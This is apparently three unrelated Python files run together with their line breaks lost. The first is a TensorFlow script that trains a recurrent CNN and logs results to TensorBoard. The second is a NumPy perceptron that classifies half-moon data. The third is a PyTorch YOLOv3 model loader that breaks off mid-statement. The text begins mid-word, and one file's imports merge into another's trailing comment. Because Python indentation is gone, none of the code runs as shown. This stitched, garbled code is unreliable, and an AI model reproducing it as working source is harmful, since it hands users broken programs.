errno import importlib # from tensorflow.contrib.tensorboard.plugins import projector from tensorboard.plugins import projector # TODO: Integrate class activation map helper into building blocks, # i.e. CAM Module # custom libraries # ----- import utilities.tfevent_handler as tfevent_handler import utilities.tfrecord_handler as tfrecord_handler import utilities.visualizer as visualizer import utilities.helper as helper import utilities.networks.buildingblocks as bb import utilities.networks.preprocessor as preprocessor import utilities.afterburner as afterburner # cross-platform development from platform import system IS_MACOSX = True if system() == 'Darwin' else False PWD_STEM = "/Users/markus/Research/Code/" if IS_MACOSX else "/home/mernst/git/" # commandline arguments # ----- # FLAGS tf.flags.DEFINE_boolean('testrun', False, 'simple configuration on local machine to test') tf.flags.DEFINE_string('config_file', PWD_STEM + #'/Users/markus/Research/Code/' + #'/home/mernst/git/'+ 'saturn/experiments/001_noname_experiment/' + 'files/config_files/config0.csv', 'path to the configuration file of the experiment') tf.flags.DEFINE_string('name', '', 'name of the run, i.e. iteration1') tf.flags.DEFINE_boolean('restore_ckpt', True, 'restore model from last checkpoint') FLAGS = tf.flags.FLAGS CONFIG = helper.infer_additional_parameters( helper.read_config_file(FLAGS.config_file) ) class LearningRate(object): """ LearningRate interits from object. It stores internal variables for learning rate parameters and has tf methods to decay the learning rate or to divide it by 10 """ def __init__(self, lrate, eta, delta, d, global_epoch_variable): super(LearningRate, self).__init__() self.rate = tf.Variable(lrate, trainable=False, name='learning_rate') self.eta = tf.Variable(eta, trainable=False, name='learning_rate_eta') self.delta = tf.Variable(delta, trainable=False, name='learning_rate_delta') self.d = tf.Variable(d, trainable=False, name='learning_rate_d') self.divide_by_10 = tf.assign(self.rate, self.rate / 10, name='divide_by_10') # TODO: initial learning rate should be specified in the setup self.decay_by_epoch = tf.assign( self.rate, self.eta * self.delta ** (tf.cast(global_epoch_variable, tf.float32) / self.d), name='decay_by_epoch') class EmbeddingObject(object): """ EmbeddingObject inherits from object. It stores internal variables for thumbnailsize, thumbnails, labels and embedding and has tf methods to update and reset the embedding at testtime. """ def __init__(self, thumbnailsize, image_height, image_width, image_channels, batchsize, network_depth, network, accuracy): super(EmbeddingObject, self).__init__() self.thu_height = thumbnailsize self.thu_width = int(image_width / image_height * 32) self.total = {} update_embedding_preclass = {} reset_embedding_preclass = {} # these shapes are set to cover the standard networks # change for different embedding visualization self.labels = tf.Variable(tf.zeros( shape=0, dtype=tf.int64), validate_shape=False, name="preclass_labels", trainable=False) self.thumbnails = tf.Variable(tf.zeros( shape=[0, self.thu_height, self.thu_height, image_channels], dtype=tf.float32), validate_shape=False, name="embedding_thumbnails", trainable=False) update_embedding_labels = tf.assign(self.labels, tf.concat( [self.labels, tf.argmax(labels.variable, axis=-1)], axis=0), validate_shape=False) update_embedding_thumbnails = tf.assign( self.thumbnails, tf.concat( [self.thumbnails, tf.cast( tf.image.resize_with_crop_or_pad( tf.image.resize( inp.variable, [self.thu_height, self.thu_width]), self.thu_height, self.thu_height), dtype=tf.float32)], axis=0), validate_shape=False) reset_embedding_labels = tf.assign(self.labels, tf.zeros( shape=0, dtype=tf.int64), validate_shape=False) reset_embedding_thumbnails = tf.assign( self.thumbnails, tf.zeros( shape=[0, self.thu_height, self.thu_height, image_channels], dtype=tf.float32), validate_shape=False) # TODO: how to do timesteps here without having accuracy? for time in accuracy.outputs: embedding_tensor = tf.reshape(network.layers["dropoutc{}".format( network_depth - 1)].outputs[time], (batchsize, -1)) self.total[time] = tf.Variable( tf.zeros(shape=[0, tf.shape(embedding_tensor)[-1]], dtype=tf.float32), validate_shape=False, name="preclass_{}".format(time), trainable=False) update_embedding_preclass[time] = tf.assign( self.total[time], tf.concat([self.total[time], embedding_tensor], axis=0), validate_shape=False) reset_embedding_preclass[time] = tf.assign( self.total[time], tf.zeros(shape=[0, tf.shape(embedding_tensor)[-1]], dtype=tf.float32), validate_shape=False) self.update = tf.group(tf.stack( (list(update_embedding_preclass.values()))), update_embedding_labels, update_embedding_thumbnails) self.reset = tf.group(tf.stack( (list(reset_embedding_preclass.values()))), reset_embedding_labels, reset_embedding_thumbnails) class TestAccuracy(object): """ TestAccuracy inherits from object. It provides internal variables for accuracy and loss at different times and tf methods to update and reset during testtime. """ def __init__(self, accuracy, error, label_type, partial_accuracy): super(TestAccuracy, self).__init__() self.count = tf.Variable(0., trainable=False) update_count = tf.assign_add(self.count, 1.) reset_count = tf.assign(self.count, 0.) total_test_accuracy = {} self.total_test_loss = {} update_total_test_accuracy = {} update_total_test_loss = {} reset_total_test_accuracy = {} reset_total_test_loss = {} self.average_accuracy = {} self.average_cross_entropy = {} for time in accuracy.outputs: total_test_accuracy[time] = tf.Variable(0., trainable=False) self.total_test_loss[time] = tf.Variable(0., trainable=False) update_total_test_accuracy[time] = tf.assign_add( total_test_accuracy[time], accuracy.outputs[time]) update_total_test_loss[time] = tf.assign_add( self.total_test_loss[time], error.outputs[time]) reset_total_test_loss[time] = tf.assign( self.total_test_loss[time], 0.) reset_total_test_accuracy[time] = tf.assign( total_test_accuracy[time], 0.) self.average_accuracy[time] = \ total_test_accuracy[time] / self.count self.average_cross_entropy[time] = \ self.total_test_loss[time] / self.count update_accloss = tf.stack( (list(update_total_test_loss.values()) + list( update_total_test_accuracy.values()))) reset_accloss = tf.stack( (list(reset_total_test_accuracy.values()) + list( reset_total_test_loss.values()))) if label_type == 'nhot': total_test_partial_accuracy = {} update_total_test_partial_accuracy = {} reset_total_test_partial_accuracy = {} self.average_partial_accuracy = {} for time in partial_accuracy.outputs: total_test_partial_accuracy[time] = tf.Variable( 0., trainable=False) update_total_test_partial_accuracy[time] = \ tf.assign_add( total_test_partial_accuracy[time], partial_accuracy.outputs[time]) reset_total_test_partial_accuracy[time] = tf.assign( total_test_partial_accuracy[time], 0.) self.average_partial_accuracy[time] = \ total_test_partial_accuracy[time] / self.count update_accloss = tf.stack((list(update_total_test_loss.values( )) + list(update_total_test_accuracy.values()) + list(update_total_test_partial_accuracy.values()))) reset_accloss = tf.stack((list(reset_total_test_accuracy.values( )) + list(reset_total_test_loss.values()) + list(reset_total_test_partial_accuracy.values()))) else: self.average_partial_accuracy = self.average_accuracy self.update = tf.group(update_accloss, update_count) self.reset = tf.group(reset_accloss, reset_count) class ConfusionMatrix(object): """ ConfusionMatrix inherits from object. It provides access to the total_confusion_matrix and tf methods to update and reset during testtime. """ def __init__(self, network, labels, classes, time_depth): super(ConfusionMatrix, self).__init__() self.total = tf.Variable( tf.zeros([classes, classes]), name="confusion_matrix", trainable=False) update_confusion_matrix = tf.assign_add( self.total, tf.matmul(tf.transpose( tf.one_hot(tf.argmax( network.outputs[time_depth], 1), classes)), labels.outputs[time_depth])) reset_confusion_matrix = tf.assign( self.total, tf.zeros([classes, classes])) self.update = tf.group(update_confusion_matrix) self.reset = tf.group(reset_confusion_matrix) # constants # ----- INP_MIN = -1 INP_MAX = 1 DTYPE = tf.float32 # TODO fill this into the infer_additional_parameters # use sigmoid for n-hot task, otherwise softmax # define network io modules # ----- circuit = importlib.import_module(CONFIG['network_module']) inp = bb.NontrainableVariableModule("input", (CONFIG['batchsize'], CONFIG['image_height_input'], CONFIG['image_width_input'], CONFIG['image_channels']), dtype=DTYPE) labels = bb.NontrainableVariableModule("input_labels", (CONFIG['batchsize'], CONFIG['classes']), dtype=DTYPE) keep_prob = bb.PlaceholderModule( "keep_prob", shape=(), dtype=DTYPE) is_training = bb.PlaceholderModule( "is_training", shape=(), dtype=tf.bool) # TODO: This could be one class that can be incremented and maybe even account # for batch accuracy. global_step = tf.Variable(0, trainable=False, name='global_step') increment_global_step = tf.assign_add( global_step, 1, name='increment_global_step') global_epoch = tf.Variable(0, trainable=False, name='global_epoch') increment_global_epoch = tf.assign_add( global_epoch, 1, name='increment_global_epoch') lrate = LearningRate(CONFIG['learning_rate'], CONFIG['lr_eta'], CONFIG['lr_delta'], CONFIG['lr_d'], global_epoch) # handle input/output directies # ----- # check directories TFRECORD_DIRECTORY, PARSER = helper.get_input_directory(CONFIG) WRITER_DIRECTORY, CHECKPOINT_DIRECTORY = \ helper.get_output_directory(CONFIG, FLAGS) # get image data # ----- # assign data_directories training_filenames, validation_filenames, test_filenames,\ evaluation_filenames = helper.get_image_files(TFRECORD_DIRECTORY, CONFIG['training_dir'], CONFIG['validation_dir'], CONFIG['test_dir'], CONFIG['evaluation_dir'], CONFIG['input_dir'], CONFIG['dataset'], CONFIG['n_occluders'], CONFIG['downsampling']) # parse data from tf-record files filenames = tf.placeholder(tf.string, shape=[None]) dataset = tf.data.TFRecordDataset(filenames) dataset = dataset.map(PARSER) if FLAGS.testrun: dataset = dataset.take(100) # take smaller dataset for testing dataset = dataset.shuffle(CONFIG['buffer_size']) # bad for evaluation? dataset = dataset.batch(CONFIG['batchsize'], drop_remainder=True) iterator = tf.data.make_initializable_iterator(dataset) next_batch = iterator.get_next() inp_left = next_batch[0] inp_right = next_batch[1] # preliminary support for grayscale within training if CONFIG['color'] == 'grayscale' and not('mnist' in CONFIG['dataset']): inp_left = tf.image.rgb_to_grayscale(inp_left) inp_right = tf.image.rgb_to_grayscale(inp_right) if not CONFIG['stereo']: inp_unknown = inp_left # define occlusion percentage if len(next_batch) > 4: occlusion_percentage = next_batch[-3] else: occlusion_percentage = tf.convert_to_tensor( np.repeat(CONFIG['occlusion_percentage'], CONFIG['batchsize'])) else: inp_unknown = tf.concat([inp_left, inp_right], axis=3) if len(next_batch) > 4: occlusion_percentage = (next_batch[-3] + next_batch[-4])/2 else: occlusion_percentage = tf.convert_to_tensor( np.repeat(CONFIG['occlusion_percentage'], CONFIG['batchsize'])) if CONFIG['label_type'] == "onehot": labels.variable = labels.variable.assign(next_batch[-1]) else: labels.variable = labels.variable.assign(next_batch[-2]) inp.variable = inp.variable.assign(inp_unknown) # initialize network classes # ----- # preprocessor # ----- # TODO: # This is a dynamic preprocessor. Maybe it would make sense to write a static # one and to write relevant files to disk to save computational ressources. inp_prep = preprocessor.PreprocessorNetwork("preprocessor", INP_MIN, INP_MAX, CONFIG['cropped'], CONFIG['augmented'], CONFIG['norm_by_stat'], CONFIG['image_height'], CONFIG['image_width'], CONFIG['image_channels'], CONFIG['batchsize'], is_training.placeholder) inp_prep.add_input(inp) # network # ----- network = circuit.constructor("rcnn", CONFIG, is_training.placeholder, keep_prob.placeholder, custom_net_parameters=None) one_time_error = bb.ErrorModule("cross_entropy", CONFIG['crossentropy_fn']) error = bb.TimeAddModule("add_error") optimizer = bb.OptimizerModule("adam", tf.train.AdamOptimizer(lrate.rate)) accuracy = bb.BatchAccuracyModule("accuracy") network.add_input(inp_prep) one_time_error.add_input(network) one_time_error.add_input(labels) error.add_input(one_time_error, 0) error.add_input(error, -1) # seems to work, but is this the right way..? optimizer.add_input(error) accuracy.add_input(network) accuracy.add_input(labels) # L2 regularization term if CONFIG['l2_lambda'] != 0: lossL2 = bb.NontrainableVariableModule("lossL2", (), dtype=tf.float32) lossL2.variable = lossL2.variable.assign( tf.add_n( [tf.nn.l2_loss(v) for v in tf.trainable_variables()]) * CONFIG['l2_lambda'] / (CONFIG['time_depth'] + 1)) error.add_input(lossL2, 0) else: pass # create outputs, i.e. unfold the network error.create_output(CONFIG['time_depth'] + CONFIG['time_depth_beyond']) optimizer.create_output(CONFIG['time_depth']) for time in range(CONFIG['time_depth'] + CONFIG['time_depth_beyond'] + 1): accuracy.create_output(time) if CONFIG['label_type'] == 'nhot': partial_accuracy = bb.NHotBatchAccuracyModule( "partial_accuracy", all_labels_true=False) accuracy = bb.NHotBatchAccuracyModule("accuracy", all_labels_true=True) accuracy.add_input(network) accuracy.add_input(labels) partial_accuracy.add_input(network) partial_accuracy.add_input(labels) for time in range(0, (CONFIG['time_depth'] + CONFIG['time_depth_beyond'] + 1)): accuracy.create_output(time) partial_accuracy.create_output(time) # get information about which stimuli got classified correctly bool_classification = tf.reduce_all(tf.equal(tf.reduce_sum( tf.one_hot(tf.nn.top_k(network.outputs[CONFIG['time_depth']], k=tf.count_nonzero( labels.variable[-1], dtype=tf.int32)).indices, depth=tf.shape(labels.variable)[-1]), axis=-2), labels.variable), axis=-1) bcx1 = tf.nn.top_k(network.outputs[CONFIG['time_depth']], k=tf.count_nonzero( labels.variable[-1], dtype=tf.int32)).indices bcx2 = tf.nn.top_k(labels.variable, k=tf.count_nonzero( labels.variable[-1], dtype=tf.int32)).indices bool_classification = tf.stack([bcx1, bcx2]) else: bool_classification = tf.equal( tf.argmax(network.outputs[CONFIG['time_depth']], 1), tf.argmax(labels.variable, 1)) partial_accuracy = accuracy # average accuracy and error at mean test-time # ----- # embedding object for storing high dimensional representation embedding = EmbeddingObject(thumbnailsize=32, image_height=CONFIG['image_height'], image_width=CONFIG['image_width'], image_channels=CONFIG['image_channels'], batchsize=CONFIG['batchsize'], network_depth=CONFIG['network_depth'], network=network, accuracy=accuracy) # average test accuracy and error, defines partial_accuracy if not 'nhot' testaverages = TestAccuracy(accuracy, error, CONFIG['label_type'], partial_accuracy) # confusion matrix for tensorboard confusion_matrix = ConfusionMatrix(network, labels, CONFIG['classes'], CONFIG['time_depth']) # TODO: Update Confusion Matrix in the main loop, # otherwise it will not be updated # decide which parameters get written to tfevents # ----- # write operations: test_merged, train_merged, image_merged, add_merged = \ helper.get_and_merge_summaries(network, testaverages, error, accuracy, partial_accuracy, CONFIG['time_depth'], CONFIG['time_depth_beyond'], CONFIG['stereo']) # start session, merge summaries, start writers # ----- with tf.Session() as sess: train_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/training', sess.graph) test_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/testing') add_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/testing/extra') image_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/testing/images') if FLAGS.testrun: # debug writer for metadata etc. debug_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/debug', sess.graph) run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE) run_metadata = tf.RunMetadata() saver = tf.train.Saver( keep_checkpoint_every_n_hours=1, max_to_keep=2, save_relative_paths=True) sess.run(tf.global_variables_initializer()) # training and testing functions # ----- def evaluating(train_it, flnames=evaluation_filenames, tag='Evaluation'): print(" " * 80 + "\r" + "[{}]\tstarted".format(tag), end="\r") sess.run([iterator.initializer, testaverages.reset, embedding.reset], feed_dict={filenames: flnames}) output_array = np.array([]) list_of_output_tensors = [] list_of_bc_values = [] list_of_occlusion_percentages = [] for time in range(CONFIG['time_depth']+1): list_of_output_tensors.append(tf.nn.softmax(network.outputs[time])) # delete bool_classification file if it already exists # if os.path.exists(CHECKPOINT_DIRECTORY + 'evaluation/' + # "bool_classification.txt"): # os.remove(WRITER_DIRECTORY + 'checkpoints/' + # 'evaluation/' + "bool_classification.txt") while True: try: _, _, extras, images, bc, occ, out = sess.run( [testaverages.update, embedding.update, add_merged, image_merged, bool_classification, occlusion_percentage, list_of_output_tensors], feed_dict={keep_prob.placeholder: 1.0, is_training.placeholder: False}) # save output and bool_classification data out = np.swapaxes(np.array(out), 0, 1) if len(output_array) == 0: output_array = out else: output_array = np.concatenate( [output_array, out], 0) list_of_occlusion_percentages += occ.tolist() if CONFIG['label_type'] == "onehot": list_of_bc_values += bc.astype(np.int8).tolist() else: for i in range(len(bc[0])): for el in bc[0][i]: list_of_bc_values += [int(el in set(bc[1][i]))] except (tf.errors.OutOfRangeError): break acc, loss, emb, emb_labels, emb_thu, summary = sess.run( [testaverages.average_partial_accuracy[CONFIG['time_depth']], testaverages.average_cross_entropy[CONFIG['time_depth']], embedding.total, embedding.labels, embedding.thumbnails, test_merged]) print(" " * 80 + "\r" + "[{}]\tloss: {:.5f}\tacc: {:.5f} \tstep: {}" .format(tag, loss, acc, train_it)) # pass labels to write to metafile return emb, emb_labels, emb_thu, \ list_of_bc_values, list_of_occlusion_percentages, \ output_array def write_embeddings_to_disk(emb, emb_labels, emb_thu, list_of_bc_values): saver.save(sess, CHECKPOINT_DIRECTORY + 'evaluation/' + CONFIG['exp_name'] + CONFIG['connectivity'] + CONFIG['dataset'], global_step=global_step.eval()) # define custom labels for interesting stimuli lookat = np.zeros(emb_labels.shape, dtype=np.int32) # lookat[-50:] = 1 emb_labels = np.asarray(emb_labels, dtype=np.int32) # save labels to textfile to be read by tensorboard np.savetxt(CHECKPOINT_DIRECTORY + 'evaluation/' + "metadata.tsv", np.column_stack( [emb_labels, CONFIG['class_encoding'][emb_labels], lookat, list_of_bc_values]), header="labels\tnames\tlookat\tboolclass", fmt=["%s", "%s", "%s", "%s"], delimiter="\t", comments='') # save thumbnails to sprite image visualizer.save_sprite_image(CHECKPOINT_DIRECTORY + 'evaluation/' + 'embedding_spriteimage.png', emb_thu[:, :, :, :]) # configure metadata linking projector_config = projector.ProjectorConfig() embeddings_dict = {} for i in range(CONFIG['time_depth'] + CONFIG['time_depth_beyond'] + 1): embeddings_dict[i] = projector_config.embeddings.add() embeddings_dict[i].tensor_name = \ embedding.total[i].name embeddings_dict[i].metadata_path = os.path.join( CHECKPOINT_DIRECTORY + 'evaluation/', 'metadata.tsv') embeddings_dict[i].sprite.image_path = CHECKPOINT_DIRECTORY + \ 'evaluation/' + \ 'embedding_spriteimage.png' embeddings_dict[i].sprite.single_image_dim.extend( [embedding.thu_height, embedding.thu_height]) tsne_writer = tf.summary.FileWriter( CHECKPOINT_DIRECTORY + 'evaluation/') projector.visualize_embeddings( tsne_writer, projector_config) pass def evaluate_data(projector_bool=False, flnames=evaluation_filenames): # checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIRECTORY) # if checkpoint and checkpoint.model_checkpoint_path: # saver.restore(sess, checkpoint.model_checkpoint_path) # TODO: Do we really need checkpoint restore? # TODO: maybe evaluation directory is not needed? helper.. # TODO: get the occlusion percentages here also emb, emb_labels, emb_thu, list_of_bc_values, \ list_of_occlusion_percentages, output_array = evaluating( global_step.eval(), flnames=flnames) embedding_data = {} evaluation_data = \ {'boolean_classification': np.array(list_of_bc_values), 'occlusion_percentage': np.array(list_of_occlusion_percentages), 'softmax_output': output_array} if projector_bool: write_embeddings_to_disk(emb, emb_labels, emb_thu, list_of_bc_values) embedding_data['embedding'] = emb embedding_data['labels'] = emb_labels embedding_data['thumbnails'] = emb_thu else: embedding_data = None # else: # print('[INFO] No checkpoint data found, exiting') # sys.exit() return evaluation_data, embedding_data def testing(train_it, flnames=validation_filenames, tag='Validation'): print(" " * 80 + "\r" + "[{}]\tstarted".format(tag), end="\r") sess.run(iterator.initializer, feed_dict={filenames: flnames}) sess.run([testaverages.reset, confusion_matrix.reset]) while True: try: _, _, extras, images = sess.run( [testaverages.update, confusion_matrix.update, add_merged, image_merged], feed_dict={keep_prob.placeholder: 1.0, is_training.placeholder: False}) except(tf.errors.OutOfRangeError): break acc, loss, summary = sess.run( [testaverages.average_accuracy[CONFIG['time_depth']], testaverages.average_cross_entropy[CONFIG['time_depth']], test_merged]) print(" " * 80 + "\r" + "[{}]\tloss: {:.5f}\tacc: {:.5f} \tstep: {}" .format(tag, loss, acc, train_it)) if not(FLAGS.restore_ckpt): test_writer.add_summary(summary, train_it) if CONFIG['visualization']: add_writer.add_summary(extras, train_it) image_writer.add_summary(images, train_it) # pass additional confusion matrix to image_writer cm_figure = visualizer.cm_to_figure( confusion_matrix.total.eval(), CONFIG['class_encoding']) image_writer.add_summary( tfplot.figure.to_summary( cm_figure, tag="confusionmatrix"), train_it) # helper.print_misclassified_objects( # confusion_matrix.total.eval(), # CONFIG['class_encoding'], 5) FLAGS.restore_ckpt = False return 0 def training(train_it): sess.run(iterator.initializer, feed_dict={ filenames: training_filenames}) while True: try: summary, extras, loss, acc = sess.run( [train_merged, add_merged, optimizer.outputs[CONFIG['time_depth']], accuracy.outputs[CONFIG['time_depth']]], feed_dict={keep_prob.placeholder: CONFIG['keep_prob'], is_training.placeholder: True}) if (train_it % CONFIG['write_every'] == 0): train_writer.add_summary(summary, train_it) if CONFIG['verbose']: print(" " * 80 + "\r" + "[Training]\tloss: {:.5f}\tacc: {:.5f} \tstep: {}" .format(loss, acc, train_it), end="\r") train_it = increment_global_step.eval() except (tf.errors.OutOfRangeError): _ = increment_global_epoch.eval() if CONFIG['decaying_lrate']: _ = lrate.decay_by_epoch.eval() print(" " * 80 + "\r" + "[INFO] Learningrate updated to {:.5f}" .format(lrate.rate.eval())) break return train_it # continueing from restored checkpoint # ----- if FLAGS.restore_ckpt: checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIRECTORY) if checkpoint and checkpoint.model_checkpoint_path: saver.restore(sess, checkpoint.model_checkpoint_path) print('[INFO] Restored checkpoint successfully') # subtract epochs already done CONFIG['epochs'] -= global_epoch.eval() print('[INFO] Continue training from last checkpoint:' + ' {} epochs remaining' .format(CONFIG['epochs'])) # sys.exit() else: print('[INFO] No checkpoint found,' + 'starting experiment from scratch') FLAGS.restore_ckpt = False # sys.exit() # training loop # ----- # prepare input normalization on preprocessor if CONFIG['norm_by_stat']: inp_prep.gather_statistics(sess, iterator, training_filenames, filenames, is_training, show_image=True) train_it = global_step.eval() for i_train_epoch in range(CONFIG['epochs']): if i_train_epoch % CONFIG['test_every'] == 0: _ = testing(train_it) saver.save(sess, CHECKPOINT_DIRECTORY + CONFIG['exp_name'] + FLAGS.name + CONFIG['dataset'], global_step=train_it) train_it = training(train_it) # final test (ideally on an independent testset) # ----- testing(train_it, flnames=test_filenames, tag='Testing') saver.save(sess, CHECKPOINT_DIRECTORY + CONFIG['exp_name'] + FLAGS.name + CONFIG['dataset'], global_step=train_it) evaluation_data, embedding_data = \ evaluate_data(projector_bool=CONFIG['projector'], flnames=test_filenames[:2]) # reduced [:1] train_writer.close() test_writer.close() image_writer.close() add_writer.close() # evaluation and afterburner # ----- essence = afterburner.DataEssence() essence.distill(path=WRITER_DIRECTORY, evaluation_data=evaluation_data, embedding_data=None) # embedding_data (save space) essence.write_to_file(filename=CONFIG['output_dir'] + FLAGS.config_file.split('/')[-1].split('.')[0] + '{}'.format(FLAGS.name) + '.pkl') essence.plot_essentials(CONFIG['output_dir'].rsplit('/', 2)[0] + '/visualization/' + FLAGS.config_file.split('/')[-1].split('.')[0] + '{}'.format(FLAGS.name) + '.pdf') #通过感知机分类半月数据 import numpy as np import matplotlib.pyplot as plt def sgn(y): y[y > 0] = 1 y[y < 0] = -1 return y class Perceptron(object): '''单层感知机 ''' def __init__(self, shape): super(Perceptron, self).__init__() self.w = np.ones(shape) #weigth self.b = 1.5 #the bias self.activate_func = sgn def update(self,x,y,out,learning_rate): self.w += learning_rate * x.T * (y - out) def calclate(self, x): return self.activate_func(np.dot(self.w, x.T) + self.b) def loss_func(self, pre_y, gt_y): return (pre_y - gt_y) ** 2 def train(self, x, y, epochs, learning_rate): losses = [] for epoch in range(epochs): loss_tmp = [] for i in range(x.shape[0]): out = self.calclate(x[i]) loss_tmp.append(self.loss_func(out, y[i])) self.update(x[i], y[i], out, learning_rate) losses.append(sum(loss_tmp)/len(loss_tmp)) return losses def predict(self, x): out = self.calclate(x) return out def test(self, x,y): label = self.predict(x) gt_count = np.sum(label==y) wrong_count = np.sum(label!=y) return wrong_count/(wrong_count+gt_count),gt_count/(wrong_count+gt_count) def get_params(self): return {'weight':self.w, 'bias':self.b} def draw(self): axis = [i for i in range(1000)] out = [self.w * i + self.b for i in axis] plt.plot(axis, out) plt.show() def load_data(file): x = [] y = [] with open(file, 'r') as f: lines = f.readlines() for line in lines: line = line.strip().split(',') x_item = [float(line[0]), float(line[1])] y_item = float(line[2]) x.append(x_item) y.append(y_item) return np.array(x), np.array(y) def split_data(x, y): train_x, test_x = x[:int(x.shape[0]*0.7)], x[int(x.shape[0]*0.7):] train_y, test_y = y[:int(y.shape[0]*0.7)], y[int(y.shape[0]*0.7):] return train_x, train_y, test_x, test_y if __name__ == '__main__': #进行非线性数据的分类实验时,只需要将数据的间隔缩小保证二者重合即可 desc = 'nonlinear' file = './halfmoon.txt' x,y = load_data(file) train_x, train_y, test_x, test_y = split_data(x, y) neur = Perceptron((1,2)) losses = neur.train(train_x,train_y,100, 0.0001) err,acc = neur.test(test_x, test_y) print('rate of error:', err) print('rate of accuracy:', acc) #画损失曲线 axis = [i for i in range(len(losses))] plt.figure() plt.plot(axis, losses) plt.savefig('../imgs/%s_mse_loss.png' % desc) #plt.show() #画决策面 x_aixs = x[:,0] y_aixs = x[:,1] neg_x_axis = x_aixs[y==-1] neg_y_axis = y_aixs[y==-1] pos_x_axis = x_aixs[y==1] pos_y_axis = y_aixs[y==1] #感知机的参数 params = neur.get_params() w = params['weight'] b = params['bias'] k = -1 * w[0][0] / w[0][1] b = -1 * b / w[0][1] divid_x = [i for i in range(-15,25)] divid_y = [k * i + b for i in divid_x] plt.figure() plt.plot(divid_x, divid_y, c='r') plt.scatter(neg_x_axis,neg_y_axis,c="b",s=10) plt.scatter(pos_x_axis,pos_y_axis,c="g",s=10) plt.savefig('../imgs/%s_divide.png' % desc) #保存决策面import time import torch import numpy as np import torch.nn as nn import torch.nn.functional as F from collections import defaultdict from detect.eval.src.layers import MaxPool1s, EmptyLayer, DetectionLayer, NMSLayer from detect.eval.src.utils import parse_cfg class YOLOv3(nn.Module): """YOLO v3 model Args - cfgfile: (str) path to yolo v3 config file - reso: (int) original image resolution """ def __init__(self, cfgfile, reso): super(YOLOv3, self).__init__() self.blocks = parse_cfg(cfgfile) self.reso = reso self.module_list = self.build_model(self.blocks) def build_model(self, blocks): """ Args - blocks: (list) list of building blocks description Returns - module_list: (nn.ModuleList) module list of neural network """ module_list = nn.ModuleList() in_channels = 3 # start from RGB 3 channels out_channels_list = [] for idx, block in enumerate(blocks): module = nn.Sequential() # Convolutional layer if block['type'] == 'convolutional': activation = block['activation'] try: batch_normalize = int(block['batch_normalize']) bias = False except: batch_normalize = 0 bias = True out_channels = int(block['filters']) kernel_size = int(block['size']) padding = (kernel_size - 1) // 2 if block['pad'] else 0 stride = int(block['stride']) conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, bias=bias) module.add_module("conv_{0}".format(idx), conv) if batch_normalize != 0: module.add_module("bn_{0}".format( idx), nn.BatchNorm2d(out_channels)) if activation == "leaky": # for yolo, it's either leaky ReLU or linear module.add_module("leaky_{0}".format( idx), nn.LeakyReLU(0.1, inplace=True)) # Max pooling layer elif block['type'] == 'maxpool': stride = int(block["stride"]) size = int(block["size"]) if stride != 1: maxpool = nn.MaxPool2d(size, stride) else: maxpool = MaxPool1s(size) module.add_module("maxpool_{}".format(idx), maxpool) # Up sample layer elif block['type'] == 'upsample': upsample = nn.Module() module.add_module("upsample_{}".format(idx), upsample) # Shortcut layer elif block['type'] == 'shortcut': shortcut = EmptyLayer() module.add_module("shortcut_{}".format(idx), shortcut) # Routing layer elif block['type'] == 'route': route = EmptyLayer() module.add_module('route_{}'.format(idx), route) block['layers'] = block['layers'].split(',') if len(block['layers']) == 1: start = int(block['layers'][0]) out_channels = out_channels_list[idx+start] elif len(block['layers']) == 2: start = int(block['layers'][0]) end = int(block['layers'][1]) out_channels = out_channels_list[idx + start] + out_channels_list[end] # Detection layer elif block['type'] == 'yolo': mask = block['mask'].split(',') mask = [int(x) for x in mask] anchors = block['anchors'].split(',') anchors = [int(a) for a in anchors] anchors = [(anchors[i], anchors[i+1]) for i in range(0, len(anchors), 2)] anchors = [anchors[i] for i in mask] num_classes = int(block['classes']) ignore_thresh = float(block['ignore_thresh']) detection = DetectionLayer( anchors, num_classes, self.reso, ignore_thresh) module.add_module('detection_{}'.format(idx), detection) module_list.append(module) in_channels = out_channels out_channels_list.append(out_channels) return module_list def forward(self, x, y_true=None): """ Args - x: (Tensor) input Tensor, with size[batch_size, C, H, W] Returns - detections: (Tensor) detection result with size [num_bboxes, [batch idx, x1, y1, x2, y2, p0, conf, label]] """ detections = torch.Tensor().cuda() # detection results outputs = dict() # output cache for route layer self.loss = defaultdict(float) for i, block in enumerate(self.blocks): # Convolutional, maxpooling layer if block['type'] == 'convolutional' or block['type'] == 'maxpool': x = self.module_list[i](x) outputs[i] = x elif block['type'] == 'upsample': x = F.interpolate(x, scale_factor=int(block['stride'])) outputs[i] = x # Shortcut layer elif block['type'] == 'shortcut': x = outputs[i-1] + outputs[i+int(block['from'])] outputs[i] = x # Routing layer, length = 1 or 2 elif block['type'] == 'route': layers = block['layers'] layers = [int(a) for a in layers] if len(layers) == 1: # layers = [-3]: output layer -3 x = outputs[i + (layers[0])] # layers = [-1, 61]: cat layer -1 and No.61 elif len(layers) == 2: layers[1] = layers[1] - i map1 = outputs[i + layers[0]] map2 = outputs[i + layers[1]] x = torch.cat((map1, map2), 1) # cat with depth outputs[i] = x elif block['type'] == 'yolo': x = self.module_list[i][0](x) detections = x if len(detections.size()) == 1 else torch.cat( (detections, x), 1) outputs[i] = outputs[i-1] # skip return detections def load_weights(self, path, cutoff=None): """ Load darknet weights from disk. YOLOv3 is fully convolutional, so only conv layers' weights will be loaded Darknet's weights data are organized as 1. (optinoal) bn_biases => bn_weights => bn_mean => bn_var 1. (optional) conv_bias 2. conv_weights Args - path: (str) path to .weights file - cutoff: (optinoal, int) cutting layer """ fp = open(path, 'rb') header = np.fromfile(fp, dtype=np.int32, count=4) weights = np.fromfile(fp, dtype=np.float32) fp.close() header = torch.from_numpy(header) ptr = 0 for i, module in enumerate(self.module_list): block = self.blocks[i] if cutoff is not None and i == cutoff: print("Stop before", block['type'], "block (No.%d)" % (i+1)) break if block['type'] == "convolutional": batch_normalize = int( block['batch_normalize']) if 'batch_normalize' in block else 0 conv = module[0] if batch_normalize > 0: bn = module[1] num_bn_biases = bn.bias.numel() bn_biases = torch.from_numpy( weights[ptr:ptr+num_bn_biases]) bn_biases = bn_biases.view_as(bn.bias.data) bn.bias.data.copy_(bn_biases) ptr += 